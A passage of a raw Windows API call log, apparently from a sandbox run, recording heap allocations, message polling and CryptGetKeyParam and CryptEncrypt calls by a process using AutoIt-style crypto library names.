0x43ca640 [0078.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0078.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0078.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0078.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0078.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0078.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0078.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0078.195] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0078.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0078.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0078.195] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0078.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0078.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0078.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0078.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0078.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0078.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0078.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0078.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0078.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0078.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0078.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0078.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0078.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0078.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0078.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0078.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0078.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0078.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0078.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0078.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0078.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0078.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0078.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0078.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0078.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0078.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0078.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0078.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.198] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0078.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0078.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0078.199] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0078.199] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e26a0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e26a0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0078.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.201] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0078.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.202] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.202] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0078.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0078.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0078.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0078.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0078.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0078.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0078.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0078.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0078.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0078.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0078.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0078.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0078.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0078.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0078.204] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.204] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.204] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.204] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.204] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0078.205] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x1a9b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x1aa0) returned 1 [0078.206] CharLowerBuffW (in: lpsz="byte[6817]", cchLength=0xa | out: lpsz="byte[6817]") returned 0xa [0078.206] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.206] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 